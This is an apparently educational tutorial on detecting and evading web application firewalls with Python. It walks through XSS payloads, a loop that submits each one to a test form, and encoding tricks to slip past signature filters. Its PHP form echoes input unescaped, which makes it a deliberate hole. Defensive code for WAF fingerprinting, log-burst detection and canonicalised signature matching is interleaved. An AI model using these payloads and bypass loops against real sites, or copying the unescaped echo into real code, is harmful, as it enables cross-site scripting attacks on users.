
Avoiding Web Application Firewall Using Python

Web application firewalls are usually placed in front of the web server to filter malicious traffic heading towards the server. If you are hired as a penetration tester for some company and they forgot to tell you that they are using a web application firewall, you might end up in a serious mess. The figure below depicts the working of a simple web application firewall:

[figure in the original post: web traffic passing through the web application firewall before it reaches the web server]

As you can see, it is like a wall between the web traffic and the web server. Nowadays web application firewalls are usually signature based.


What is a signature based firewall?


In a signature based firewall you define signatures; as you know, web attacks follow similar patterns, or signatures, as well. So we can define the matching patterns and block them, i.e.


Payload :- <svg><script>alert`1`<p>

The payload defined above is a kind of cross site scripting attack, and we know that all these attacks can contain the following substring: "<script>". So why don't we define a signature that blocks web traffic if it contains this substring? We can define 2-3 signatures as below:



  1. <script>

  2. alert(*)


The first signature will block any request that contains the substring "<script>", and the second one will block alert(any text). So, this is how a signature based firewall works.


How to know at that spot is a firewall?



If you are performing a penetration test and you didn't know that there was a firewall blocking the traffic, it can waste a lot of your time, because most of the time your attack payloads are getting blocked by the firewall, not by the application code, and you might end up thinking that the application you are testing is secure and good to go. So, it is a good idea to first test for the presence of a web application firewall before you start your penetration test.


Most firewalls today leave some tracks about themselves. Now, if you attack a web application using the payload we defined above and get the following response:


HTTP/1.1 406 Not Acceptable
Date: Mon, 10 January 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!
Not Acceptable! An appropriate representation of the requested resources could not be found on this server. This error was generated by Mod_Security.

You can clearly see that your attack was blocked by the Mod_Security firewall. In this article we will see how we can develop a simple Python script that can do this job of detecting the firewall and bypassing it.


Step 1: Define HTML Document and PHP Script!


We will have to define our HTML document for injection of the payload and a corresponding PHP script to handle the data. We have defined both of them below.


We will be using the following HTML document:


<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP Script:


<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!


Our second step towards detecting the firewall presence is creating a malicious cross site scripting request that can be blocked by the firewall. We will be using a Python module called 'Mechanize'; to know more about this module please read the following article:


If you already know about Mechanize, you can skip reading the article. Now that you know about Mechanize, we can select the web form present on any page and submit the request. The following code snippet can be used to do that:


import mechanize as mec

# A mechanize Browser behaves like a scriptable web browser
maliciousRequest = mec.Browser()
# name attribute of the <form> in the HTML document from Step 1
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
# select the form by name so that we can fill in its fields
maliciousRequest.select_form(formName)

Let's discuss this code line by line:



  1. On the first line we've imported the mechanize module and given it a short name 'mec' for later reference.

  2. To download a web page using mechanize, instantiation of a browser is required. We've just done that in the second line of the code.

  3. In the first step we defined our HTML document, in which the form name was 'waf'. We need to tell mechanize to select this form for submission, so we've stored this name in a variable called formName.

  4. Then we opened this URL, just like we do in a browser. After the page gets opened we fill in the form and submit data, so the opening of the page is the same here.

  5. Finally we've selected the form using the 'select_form' function, passing it the 'formName' variable.


As you can see in the HTML source code, this form has only one input field. We are going to inject our payload into that field, and once we receive the response we're going to inspect it for known strings to detect the presence of the web application firewall.


Step 3: Prepare the payload


In our HTML document we've specified one input field using this code:


<input type="text" name="data">

You can see that the name of this field is 'data'; we can use the following bit of code to define input for this field:


# the cross site scripting payload from the signature section (backticks, not parentheses)
crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"

# assign the payload to the form field named 'data'
maliciousRequest.form['data'] = crossSiteScriptingPayLoad


  1. The first line saves our payload in a variable.

  2. In the second line of code, we've assigned our payload to the form field 'data'.


We can now safely submit this form and inspect the response.


Step 4: Submit the form and record the Response


The code I am going to mention after this line will submit the form and record the response:


maliciousRequest.submit()
# read() returns bytes; decode to text so that string searches work on Python 3
response = maliciousRequest.response().read().decode("utf-8", errors="replace")

print(response)


  1. Submit the form.

  2. Save the response in a variable.

  3. Print the response back.


As I currently have no firewall installed, the response I got is:


[screenshot in the original post: the server's response, echoing the payload back]


As you can see, the payload is printed back to us, which means no filtering is present in the application code, and due to the absence of a firewall our request was also not blocked.


Step 5: Detect the Presence of a firewall


The variable named 'response' contains the response we got from the server; we can use the response to detect the presence of a firewall. We will try to detect the presence of the following firewalls in this tutorial:



  1. WebKnight.

  2. Mod_Security.

  3. Dot Defender.


Let's see how we can accomplish this with Python code:


# find() returns the index of the marker string, or -1 when it is absent
if response.find('WebKnight') >= 0:
    print("Firewall detected: WebKnight")
elif response.find('Mod_Security') >= 0:
    print("Firewall detected: Mod Security")
elif response.find('dotDefender') >= 0:
    print("Firewall detected: Dot Defender")
else:
    print("No Firewall Present")


If the WebKnight firewall is installed and our request got blocked, the response string will contain 'WebKnight' somewhere within it, so the find function will return a value of 0 or greater (it returns -1 when the string is absent), which means the WebKnight firewall is present. Similarly we can check for the other two firewalls as well. We can extend this small application to detect as many firewalls as we want, but you must know their response behavior.
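The check above is an if/elif chain with the vendor strings spread across the branches. The following is an added example, not code from the original post: the same three markers kept in one table, applied to a raw HTTP response that has been parsed into status, headers and body, so the check can be extended with one table entry per vendor and can also look at the Server header. The sample responses are constructed here: the blocked one reproduces the Mod_Security 406 page shown earlier in the article, the clean one reproduces the echo page from Step 4. The function names are my own.

```python
import re

# Marker string -> firewall name. These are the three markers the article checks
# for; add one entry per vendor whose blocking page you have observed.
WAF_MARKERS = {
    "WebKnight": "WebKnight",
    "Mod_Security": "Mod Security",
    "dotDefender": "Dot Defender",
}


def parse_raw_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).

    Header names are lowercased so lookups do not depend on the server's casing.
    """
    raw = raw.replace("\r\n", "\n")            # tolerate both line endings
    head, _, body = raw.partition("\n\n")       # blank line separates headers from body
    lines = head.splitlines()
    match = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    if not match:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(match.group(1)), headers, body


def detect_waf(raw):
    """Return the name of the firewall that produced this response, or None."""
    status, headers, body = parse_raw_response(raw)
    server = headers.get("server", "")
    for marker, name in WAF_MARKERS.items():
        if marker in body or marker in server:
            return name
    return None


# Constructed sample: the Mod_Security blocking page from the article, written
# out the way the server sends it (status line, headers, blank line, body).
SAMPLE_BLOCKED = (
    "HTTP/1.1 406 Not Acceptable\n"
    "Date: Mon, 10 January 2016\n"
    "Server: nginx\n"
    "Content-Type: text/html; charset=iso-8859-1\n"
    "\n"
    "<html><body><h1>Not Acceptable!</h1>"
    "An appropriate representation of the requested resource could not be "
    "found on this server. This error was generated by Mod_Security."
    "</body></html>\n"
)

# Constructed sample: the echo page from Step 4 with no firewall in the path.
SAMPLE_CLEAN = (
    "HTTP/1.1 200 OK\n"
    "Server: nginx\n"
    "Content-Type: text/html\n"
    "\n"
    "<html><body>Data from the form : test<br></body></html>\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_BLOCKED, SAMPLE_CLEAN):
        name = detect_waf(raw)
        print("Firewall detected: %s" % name if name else "No Firewall Present")
```

Keeping the markers in a table also makes the 406 status and the Server header available to the decision, which the body-only find() calls in the article ignore.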


Using Brute force to bypass Firewall filter


I've mentioned at the start of the article that more often than not firewalls these days block requests based on signatures. But there are hundreds and thousands of ways you can build a payload. JavaScript is becoming more complex day by day; we can make a list of payloads, try each of them, record each response and check whether we were able to bypass the firewall or not. Please note that if the firewall rules are well defined then this approach might not work. Let's see how we can brute force using Python:


import mechanize as mec

# the three cross site scripting payloads to try one after another
listofPayloads = [
    '<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>',
    '<svg><script>prompt&#40 1&#41<i>',
    '<a href="&#1;javascript:alert(1)">CLICK ME<a>',
]

for payLoad in listofPayloads:
    # same steps as before, repeated once per payload
    maliciousRequest = mec.Browser()
    formName = 'waf'
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoad
    maliciousRequest.submit()
    response = maliciousRequest.response().read().decode("utf-8", errors="replace")
    if response.find('WebKnight') >= 0:
        print("Firewall detected: WebKnight")
    elif response.find('Mod_Security') >= 0:
        print("Firewall detected: Mod Security")
    elif response.find('dotDefender') >= 0:
        print("Firewall detected: Dot Defender")
    else:
        print("No Firewall Present")



  1. On the first line we've defined a list of three payloads; you can extend this list and add as many payloads as you need.

  2. Then inside the for loop we did the same procedure we did above, but this time for each payload in the list.

  3. Upon receiving the response we once again compare and see if a firewall is present or not.
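Seen from the server side, the loop above has a recognisable footprint: each payload the firewall rejects comes back as a 406 (the Mod_Security page shown earlier), so one client collecting several 406s against the same form handler in a short window is the signature of a payload list being tried. The following is an added example, not part of the original post, that finds that pattern in web server access logs. The log lines are constructed for the example, in Apache combined format with documentation IP addresses; the article itself shows no server logs, and the function names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status"))}


def find_payload_bursts(lines, threshold=3, window=timedelta(minutes=1)):
    """Return {(ip, path): count} for clients whose blocked (406) requests to one
    path reach `threshold` inside a single `window`; count is the largest run seen."""
    blocked = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 406:
            blocked[(rec["ip"], rec["path"])].append(rec["ts"])

    bursts = {}
    for key, stamps in blocked.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # slide the window start forward until the run fits inside `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            run = end - start + 1
            if run >= threshold:
                bursts[key] = max(bursts.get(key, 0), run)
    return bursts


# Constructed sample log: three rejected submissions in three seconds from one
# client, plus an unrelated client with a page view and a single rejection.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2016:14:02:01 +0000] "POST /waf.php HTTP/1.1" 406 226 "-" "-"',
    '203.0.113.7 - - [10/Jan/2016:14:02:02 +0000] "POST /waf.php HTTP/1.1" 406 226 "-" "-"',
    '203.0.113.7 - - [10/Jan/2016:14:02:03 +0000] "POST /waf.php HTTP/1.1" 406 226 "-" "-"',
    '198.51.100.4 - - [10/Jan/2016:14:02:05 +0000] "GET /crossSiteCheck.html HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [10/Jan/2016:14:03:10 +0000] "POST /waf.php HTTP/1.1" 406 226 "-" "-"',
]

if __name__ == "__main__":
    for (ip, path), count in find_payload_bursts(SAMPLE_LOG).items():
        print("%s: %d blocked requests to %s within one minute" % (ip, count, path))
```

The threshold and window are starting points to tune against your own traffic; a single blocked request (the second client above) is ordinary noise, a tight run of them against one handler is worth an alert.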


As I've had no firewall installed, my output was:


[screenshot in the original post: the script's output for the three payloads]

Convert HTML Tags to Unicode or Hex Entities


If for example the firewall is filtering HTML tags like <b>, we can send their corresponding Unicode or Hex entities and see if they are being converted to their original form; if so, then this could be an entry point as well. The code below can be used to test this process:


import mechanize as mec

# <b> as an HTML entity, as a \u escape and as a \x escape. Raw strings keep the
# backslashes so the escape text itself is sent, not a decoded '<b>'.
listofPayloads = ['&lt;b&gt;', r'\u003cb\u003e', r'\x3cb\x3e']

for payLoad in listofPayloads:
    maliciousRequest = mec.Browser()
    formName = 'waf'
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoad
    maliciousRequest.submit()
    response = maliciousRequest.response().read().decode("utf-8", errors="replace")
    print("---------------------------------------------------")
    print(response)
    print("---------------------------------------------------")

Each time we will send the encoded entry and in the response we will test whether it got converted or was printed back without conversion. When I ran this code I got this output:


[screenshot in the original post: the three responses, each echoing the encoded entry unchanged]

This means none of the encoded entries got converted to its original form.
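The two earlier sections fit together from the filter's side: the signature section defines "<script>" and "alert(*)" as the patterns to block, and this section shows the same tag arriving as an HTML entity, a \u escape and a \x escape. A signature that is matched against the literal request text sees none of the encoded forms, so a filter has to canonicalise the input before it matches. The following is an added example, not code from the original post or from any firewall product: the article's two signatures (plus a <b> tag signature for the payloads above) as regular expressions, with a decoding step that can be switched off to show the difference. The sample inputs are the article's own payloads plus one benign value; `canonicalise` and `match_signatures` are names chosen here.

```python
import html
import re

# Signature name -> pattern. The first two are the article's signatures:
# "<script>" and "alert(*)" (alert followed by an opening parenthesis).
SIGNATURES = [
    ("script-tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
    ("alert-call", re.compile(r"\balert\s*\(", re.IGNORECASE)),
    ("b-tag", re.compile(r"<\s*b\s*>", re.IGNORECASE)),
]

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")   # \u003c
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")       # \x3c


def canonicalise(value, rounds=3):
    """Decode HTML entities, \\uXXXX and \\xXX escapes until the text stops changing.

    Bounded rounds so that nested encodings are unwrapped without looping forever.
    """
    for _ in range(rounds):
        decoded = html.unescape(value)   # &lt; &#40 and friends
        decoded = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == value:
            break
        value = decoded
    return value


def match_signatures(value, canonical=True):
    """Return the name of the first signature that matches `value`, or None.

    With canonical=False the patterns run against the raw text, which is the
    behaviour that lets encoded tags through.
    """
    text = canonicalise(value) if canonical else value
    for name, pattern in SIGNATURES:
        if pattern.search(text):
            return name
    return None


# Constructed inputs: the article's payloads (literal and encoded) and a benign value.
SAMPLES = [
    "<svg><script>alert`1`<p>",
    "&lt;b&gt;",
    r"\u003cb\u003e",
    r"\x3cb\x3e",
    "hello world",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        raw = match_signatures(sample, canonical=False)
        canon = match_signatures(sample)
        print("%-26r raw=%-10s canonical=%s" % (sample, raw, canon))
```

The decoder only knows the three encodings this section uses; a production filter would canonicalise URL encoding and charset variants the same way, and the bounded `rounds` loop is what keeps a doubly encoded value from slipping past a single decode.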


Conclusion


The purpose of this article was to educate you in advance so that you can penetrate your firewall before a hacker can. It is always a good option to self-test your network infrastructure for vulnerabilities, because our first line of work is always to get our application up and running, and we overlook the security part. But it must not be overlooked, because later it can be a huge headache. The complete source code can be downloaded from this link.


Author Info:


Usman Nasir, founder and writer of Cyberpersons, is a Computer Science student. I have also worked as technical support staff at various hosting companies and love to write about Linux and web application security.

